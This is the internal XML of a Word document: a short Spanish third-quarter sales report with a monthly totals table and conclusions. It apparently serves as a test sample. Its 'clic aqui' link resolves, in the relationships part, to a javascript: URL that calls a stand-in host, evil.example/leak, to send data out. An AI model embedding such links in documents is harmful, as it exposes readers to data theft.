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Informe de ventas del tercer trimestre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Resumen: las ventas subieron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">12 %</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> frente al trimestre anterior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detalle por mes</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/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E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Mes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Total (CLP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Julio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1.234.500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Agosto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1.310.000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crecimiento sostenido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riesgo: dependencia de un cliente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:hyperlink r:id="rIdEvil">
        <w:r>
          <w:t>clic aqui</w:t>
        </w:r>
      </w:hyperlink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lang w:val="es-CL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keepNext/>
      <w:spacing w:before="0" w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="200" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="160" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="24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table" w:styleId="TableGrid">
    <w:name w:val="Table Grid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CellMar>
        <w:left w:w="10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Evil" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:fetch(&apos;http://evil.example/leak&apos;)" TargetMode="External"/></Relationships>
</file>